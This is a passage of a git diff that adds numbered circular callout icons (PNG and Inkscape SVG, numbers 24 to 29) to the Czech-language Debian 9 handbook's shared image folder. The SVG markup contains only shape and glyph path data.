+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/24.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/24.png
new file mode 100644
index 000000000..863ce3b66
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/24.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/24.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/24.svg
new file mode 100644
index 000000000..27e1d39c9
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/24.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/25.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/25.png
new file mode 100644
index 000000000..cc23b9b2b
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/25.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/25.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/25.svg
new file mode 100644
index 000000000..114e1a26b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/25.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/26.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/26.png
new file mode 100644
index 000000000..583fe3486
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/26.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/26.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/26.svg
new file mode 100644
index 000000000..e9b5d239b
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/26.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/27.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/27.png
new file mode 100644
index 000000000..d1c3dfa45
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/27.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/27.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/27.svg
new file mode 100644
index 000000000..4a80177b6
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/27.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/28.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/28.png
new file mode 100644
index 000000000..f5db74735
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/28.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/28.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/28.svg
new file mode 100644
index 000000000..d453f299f
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/28.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/29.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/29.png
new file mode 100644
index 000000000..9a3141ec4
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/29.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/29.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/29.svg
new file mode 100644
index 000000000..04b5c5034
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/29.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
